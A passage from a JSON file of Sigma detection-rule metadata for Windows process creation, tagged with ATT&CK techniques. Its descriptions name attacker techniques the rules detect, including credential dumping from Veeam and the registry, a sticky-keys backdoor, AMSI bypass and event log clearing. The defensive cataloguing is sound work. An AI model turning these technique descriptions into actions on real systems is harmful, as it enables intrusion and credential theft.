"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msedge_proxy_download.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e84d89c4-f544-41ca-a6af-4b92fd38b023", "value": "Arbitrary File Download Via MSEDGE_PROXY.EXE" }, { "description": "Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload.\n", "meta": { "author": "Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)", "creation_date": "2023-09-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_addinutil_uncommon_child_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b5746143-59d6-4603-8d06-acbd60e166ee", "value": "Uncommon Child Process Of AddinUtil.EXE" }, { "description": "Detects the execution of \"lodctr.exe\" to rebuild the performance counter registry values. 
This can be abused by attackers by providing a malicious config file to overwrite performance counter configuration to confuse and evade monitoring and security solutions.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-15", "falsepositive": [ "Legitimate usage by an administrator" ], "filename": "proc_creation_win_lodctr_performance_counter_tampering.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/security/identity-protection/virtual-smart-cards/virtual-smart-card-tpmvscmgr", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lodctr_performance_counter_tampering.yml" ], "tags": [ "attack.execution" ] }, "uuid": "cc9d3712-6310-4320-b2df-7cb408274d53", "value": "Rebuild Performance Counter Values Via Lodctr.EXE" }, { "description": "Detects suspicious command line reg.exe tool adding key to RUN key in Registry", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-06-28", "falsepositive": [ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", "Legitimate administrator sets up autorun keys for legitimate reasons.", "Discord" ], "filename": "proc_creation_win_reg_add_run_key.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys", "https://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"de587dce-915e-4218-aac4-835ca6af6f70", "value": "Potential Persistence Attempt Via Run Keys Using Reg.EXE" }, { "description": "Detects execution of \"odbcconf\" with \"INSTALLDRIVER\" which installs a new ODBC driver. Attackers abuse this to install and run malicious DLLs.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-22", "falsepositive": [ "Legitimate driver DLLs being registered via \"odbcconf\" will generate false positives. Investigate the path of the DLL and its contents to determine if the action is authorized." ], "filename": "proc_creation_win_odbcconf_driver_install.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/", "https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176", "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_driver_install.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.008" ] }, "related": [ { "dest-uuid": "6e3bd510-6b33-41a4-af80-2d80f3ee0071", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3f5491e2-8db8-496b-9e95-1029fce852d4", "value": "Driver/DLL Installation Via Odbcconf.EXE" }, { "description": "Detects suspicious execution of rundll32, with specific calls to some DLLs with known LOLBIN functionalities", "meta": { "author": "juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2019-01-16", "falsepositive": [ "False positives depend on scripts and administrative tools used in the monitored environment" ], "filename": "proc_creation_win_rundll32_susp_activity.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ 
"https://twitter.com/eral4m/status/1479106975967240209", "https://twitter.com/Hexacorn/status/885258886428725250", "http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/", "https://twitter.com/eral4m/status/1479080793003671557", "https://twitter.com/nas_bench/status/1433344116071583746", "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.011" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e593cf51-88db-4ee1-b920-37e89012a3c9", "value": "Potentially Suspicious Rundll32 Activity" }, { "description": "Detects an uncommon svchost parent process", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-08-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_svchost_uncommon_parent_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_svchost_uncommon_parent_process.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.005" ] }, "related": [ { "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", "value": "Uncommon Svchost Parent Process" }, { "description": "Use of reg to get MachineGuid information", "meta": { "author": "frack113", "creation_date": "2022-01-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_reg_machineguid.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", 
"refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-8---windows-machineguid-discovery", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_machineguid.yml" ], "tags": [ "attack.discovery", "attack.t1082" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f5240972-3938-4e56-8e4b-e33893176c1f", "value": "Suspicious Query of MachineGUID" }, { "description": "By replacing the sticky keys executable with the local CMD executable, an attacker is able to obtain a privileged Windows console session without authenticating to the system.\nWhen sticky keys are \"activated\", the privileged shell is launched.\n", "meta": { "author": "Sreeman", "creation_date": "2020-02-18", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_cmd_sticky_keys_replace.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign-v1.pdf", "https://learn.microsoft.com/en-us/archive/blogs/jonathantrull/detecting-sticky-key-backdoors", "https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_sticky_keys_replace.yml" ], "tags": [ "attack.t1546.008", "attack.privilege-escalation" ] }, "related": [ { "dest-uuid": "70e52b04-2a0c-4cea-9d18-7149f1df9dc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", "value": "Persistence Via Sticky Key Backdoor" }, { "description": "Detects a dump of stored credentials from the VeeamBackup database (dbo schema) via sqlcmd", "meta": { "author": "frack113", "creation_date": 
"2021-12-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sqlcmd_veeam_dump.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://forums.veeam.com/veeam-backup-replication-f2/recover-esxi-password-in-veeam-t34630.html", "https://thedfirreport.com/2021/12/13/diavol-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml" ], "tags": [ "attack.collection", "attack.t1005" ] }, "related": [ { "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b57ba453-b384-4ab9-9f40-1038086b4e53", "value": "VeeamBackup Database Credentials Dump Via Sqlcmd.EXE" }, { "description": "Detects potentially suspicious child processes of \"GoogleUpdate.exe\"", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_googleupdate_susp_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_googleupdate_susp_child_process.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "84b1ecf9-6eff-4004-bafb-bae5c0e251b2", "value": "Potentially Suspicious GoogleUpdate Child Process" }, { "description": "Detects usage of winget to add new potentially suspicious download sources", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-17", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_winget_add_susp_custom_source.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", 
"refs": [ "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget", "https://learn.microsoft.com/en-us/windows/package-manager/winget/source", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winget_add_susp_custom_source.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c15a46a0-07d4-4c87-b4b6-89207835a83b", "value": "Add Potential Suspicious New Download Source To Winget" }, { "description": "Detects the clearing or configuration tampering of EventLog using utilities such as \"wevtutil\", \"powershell\" and \"wmic\".\nThis technique were seen used by threat actors and ransomware strains in order to evade defenses.\n", "meta": { "author": "Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105", "creation_date": "2019-09-26", "falsepositive": [ "Admin activity", "Scripts and administrative tools used in the monitored environment", "Maintenance activity" ], "filename": "proc_creation_win_susp_eventlog_clear.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", "https://gist.github.com/fovtran/ac0624983c7722e80a8f5a4babb170ee", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", "https://jdhnet.wordpress.com/2017/12/19/changing-the-location-of-the-windows-event-logs/", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.001", 
"attack.t1562.002", "car.2016-04-002" ] }, "related": [ { "dest-uuid": "6495ae23-3ab4-43c5-a94f-5638a2c31fd2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", "value": "Suspicious Eventlog Clearing or Configuration Change Activity" }, { "description": "Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands\n", "meta": { "author": "Cian Heasley, Florian Roth (Nextron Systems)", "creation_date": "2020-07-22", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_webshell_tool_recon.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://ragged-lab.blogspot.com/2020/07/webshells-automating-reconnaissance.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_tool_recon.yml" ], "tags": [ "attack.persistence", "attack.t1505.003" ] }, "related": [ { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f64e5c19-879c-4bae-b471-6d84c8339677", "value": "Webshell Tool Reconnaissance Activity" }, { "description": "Detects scheduled task creations that have suspicious action command and folder combinations", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-04-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_schtasks_folder_combos.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ 
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_folder_combos.yml" ], "tags": [ "attack.execution", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", "value": "Schtasks From Suspicious Folders" }, { "description": "Detects execution of \"rundll32\" calling \"advpack.dll\" with potential obfuscated ordinal calls in order to leverage the \"RegisterOCX\" function", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-17", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_rundll32_advpack_obfuscated_ordinal_call.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/Hexacorn/status/1224848930795552769", "http://www.hexacorn.com/blog/2020/02/05/stay-positive-lolbins-not/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_advpack_obfuscated_ordinal_call.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "a1473adb-5338-4a20-b4c3-126763e2d3d3", "value": "Suspicious Advpack Call Via Rundll32.EXE" }, { "description": "Detects usage of the Quarks PwDump tool via commandline arguments", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-05", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_quarks_pwdump.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east", "https://github.com/quarkslab/quarkspwdump", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_quarks_pwdump.yml" ], "tags": [ "attack.credential-access", "attack.t1003.002" ] }, "related": [ { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0685b176-c816-4837-8e7b-1216f346636b", "value": "HackTool - Quarks PwDump Execution" }, { "description": "Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls", "meta": { "author": "pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t", "creation_date": "2022-05-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_base64_invoke.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_invoke.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6385697e-9f1b-40bd-8817-f4a91f40508e", "value": "PowerShell Base64 Encoded Invoke Keyword" }, { "description": "Detects execution of findstr with the \"s\" and \"i\" flags for a \"subfolder\" and \"insensitive\" search respectively. 
Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands.\n", "meta": { "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2020-10-05", "falsepositive": [ "Administrative or software activity" ], "filename": "proc_creation_win_findstr_subfolder_search.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Findstr/", "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_subfolder_search.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218", "attack.t1564.004", "attack.t1552.001", "attack.t1105" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "04936b66-3915-43ad-a8e5-809eadfd1141", "value": "Insensitive Subfolder Search Via Findstr.EXE" }, { "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials.\nThe Windows Registry stores configuration information that can be used by the system or other programs.\nAdversaries may query the Registry looking for 
credentials and passwords that have been stored for use by other programs or services\n", "meta": { "author": "frack113", "creation_date": "2021-12-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_reg_enumeration_for_credentials_in_registry.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.002/T1552.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_enumeration_for_credentials_in_registry.yml" ], "tags": [ "attack.credential-access", "attack.t1552.002" ] }, "related": [ { "dest-uuid": "341e222a-a6e3-4f6f-b69c-831d792b1580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1", "value": "Enumeration for Credentials in Registry" }, { "description": "Detects execution of the \"finger.exe\" utility.\nFinger.EXE or \"TCPIP Finger Command\" is an old utility that is still present on modern Windows installation. It Displays information about users on a specified remote computer (typically a UNIX computer) that is running the finger service or daemon.\nDue to the old nature of this utility and the rareness of machines having the finger service. 
Any execution of \"finger.exe\" can be considered \"suspicious\" and worth investigating.\n", "meta": { "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", "creation_date": "2021-02-24", "falsepositive": [ "Admin activity (unclear what they do nowadays with finger.exe)" ], "filename": "proc_creation_win_finger_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/bigmacjpg/status/1349727699863011328?s=12", "https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/", "http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_finger_execution.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "af491bca-e752-4b44-9c86-df5680533dbc", "value": "Finger.EXE Execution" }, { "description": "Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-19", "falsepositive": [ "Legitimate usage of the script by a developer" ], "filename": "proc_creation_win_lolbin_launch_vsdevshell.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/nas_bench/status/1535981653239255040", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml" ], "tags": [ "attack.defense-evasion", "attack.t1216.001" ] }, "related": [ { "dest-uuid": "09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], 
"uuid": "45d3a03d-f441-458c-8883-df101a3bb146", "value": "Launch-VsDevShell.PS1 Proxy Execution" }, { "description": "Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-08-22", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_pua_csexec.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/malcomvetter/CSExec", "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_csexec.yml" ], "tags": [ "attack.resource-development", "attack.t1587.001", "attack.execution", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d08a2711-ee8b-4323-bdec-b7d85e892b31", "value": "PUA - CsExec Execution" }, { "description": "Detects Request to \"amsiInitFailed\" that can be used to disable AMSI Scanning", "meta": { "author": "Markus Neis, @Kostastsale", "creation_date": "2018-08-17", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_powershell_amsi_init_failed_bypass.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/", "https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_amsi_init_failed_bypass.yml" ], "tags": [ 
"attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "30edb182-aa75-42c0-b0a9-e998bb29067c", "value": "Potential AMSI Bypass Via .NET Reflection" }, { "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", "meta": { "author": "Jonathan Cheong, oscd.community", "creation_date": "2020-10-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_invoke_obfuscation_var.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_var.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "27aec9c9-dbb0-4939-8422-1742242471d0", "value": "Invoke-Obfuscation VAR+ Launcher" }, { "description": "Detects execution of the \"wusa.exe\" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location.\nAttackers could instantiate an instance of \"wusa.exe\" in order to bypass User Account Control (UAC). 
They can duplicate the access token from \"wusa.exe\" to gain elevated privileges.\n", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-11-26", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wusa_susp_parent_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.fortinet.com/blog/threat-research/konni-campaign-distributed-via-malicious-document", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wusa_susp_parent_execution.yml" ], "tags": [ "attack.execution" ] }, "uuid": "ef64fc9c-a45e-43cc-8fd8-7d75d73b4c99", "value": "Wusa.EXE Executed By Parent Process Located In Suspicious Location" }, { "description": "Detects the use of CleanWipe, a tool usually used to remove Symantec antivirus.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-12-18", "falsepositive": [ "Legitimate administrative use (should be investigated either way)" ], "filename": "proc_creation_win_pua_cleanwipe.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/CleanWipe", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_cleanwipe.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f44800ac-38ec-471f-936e-3fa7d9c53100", "value": "PUA - CleanWipe Execution" }, { "description": "Detects the execution of different Windows-based hacktools via their import hash (imphash) even if the files have been renamed", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-04", "falsepositive": [ "Legitimate use of one of these tools" 
], "filename": "proc_creation_win_hktl_execution_via_imphashes.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_execution_via_imphashes.yml" ], "tags": [ "attack.credential-access", "attack.t1588.002", "attack.t1003" ] }, "related": [ { "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "24e3e58a-646b-4b50-adef-02ef935b9fc8", "value": "Hacktool Execution - Imphash" }, { "description": "Detects usage of the Sharp Chisel via the commandline arguments", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-05", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_sharp_chisel.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/shantanu561993/SharpChisel", "https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharp_chisel.yml" ], "tags": [ "attack.command-and-control", "attack.t1090.001" ] }, "related": [ { "dest-uuid": "f6dacc85-b37d-458e-b58d-74fc4bbf5755", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", "value": "HackTool - SharpChisel Execution" }, { "description": "Detects the execution of CSharp interactive console by PowerShell", "meta": { "author": "Michael R. 
